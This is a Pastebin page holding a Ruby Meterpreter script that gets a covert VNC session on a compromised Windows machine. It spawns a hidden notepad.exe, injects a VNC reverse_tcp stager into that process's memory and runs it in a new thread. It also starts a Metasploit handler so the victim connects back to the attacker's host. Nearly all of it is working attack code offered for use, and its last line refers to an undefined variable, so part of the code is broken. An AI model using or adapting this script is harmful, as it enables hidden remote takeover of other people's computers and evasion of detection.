SHARE
TWEET

hhmatt

a guest Jan 29th, 2010 1,021 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # $Id: vnc_mem.rb 12-17-2009 hdm $
  2. #
  3. # Meterpreter script for obtaining a quick VNC session
  4. # Hybrid of vnc.rb and vnc_oneport.rb
  5. # Utilizes memory functions so no file is created
  6. # All code written by H.D. Moore (hdm)
  7. # Edited by hhmatt
  8. #
  9.  
  10. session = client
  11.  
  12. #
  13. # Options
  14. #
  15. opts = Rex::Parser::Arguments.new(
  16.     "-h"  => [ false,  "This help menu"],<br>
  17.     "-r"  => [ true,  "The IP of the system running Metasploit listening for the connect back"],
  18.     "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
  19. #    "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
  20.     "-e"  => [ true,    "The process to run and inject into (default:notepad.exe)"])
  21.  
  22. #
  23. # Default parameters
  24. #
  25. runme    = "notepad.exe"
  26. rhost    = Rex::Socket.source_address("1.2.3.4")
  27. rport    = 4545
  28. #autoconn = true
  29.  
  30. #
  31. # Option parsing
  32. #
  33. opts.parse(args) do |opt, idx, val|
  34.         case opt
  35.         when "-h"
  36.                 print_line(opts.usage)
  37.                 return
  38.         when "-r"
  39.                 rhost = val
  40.         when "-p"
  41.                 rport = val.to_i
  42. #       when "-D"
  43. #               autoconn = false
  44.         when "-e"
  45.                 runme = val
  46.         end
  47. end
  48.  
  49. #
  50. # Create the agent EXE
  51. #
  52. print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
  53. pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
  54. pay.datastore['LHOST'] = rhost
  55. pay.datastore['LPORT'] = rport
  56. raw  = pay.generate
  57. exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
  58. print_status("VNC stager executable #{exe.length} bytes long")
  59.  
  60. #
  61. # Create a host process
  62. #
  63. pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
  64. print_status("Host process #{runme} has PID #{pid}")
  65. note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
  66. mem  = note.memory.allocate(1024*32)
  67. print_status("Allocated memory at address #{"0x%.8x" % mem}")
  68. print_status("Writing the VNC stager into memory...")
  69. note.memory.write(mem, raw)
  70.  
  71. #
  72. # Setup the multi/handler
  73. #
  74.         mul = client.framework.exploits.create("multi/handler")
  75.         mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
  76.         mul.datastore['LHOST']     = rhost
  77.         mul.datastore['LPORT']     = rport
  78.         mul.datastore['EXITFUNC']  = 'process'
  79.         mul.datastore['ExitOnSession'] = true
  80.         mul.datastore['DisableCourtesyShell'] = true
  81.         mul.exploit_simple(
  82.                 'Payload'        => mul.datastore['PAYLOAD'],
  83.                 'RunAsJob'       => true)
  84.  
  85. #
  86. # Execute the agent
  87. #
  88. print_status("Creating a new thread within #{runme} to run the VNC stager...")
  89. note.thread.create(mem, 0)
  90. print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
  91. proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
RAW Paste Data
Want to get better at Ruby?
Learn to code Ruby in 2017
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top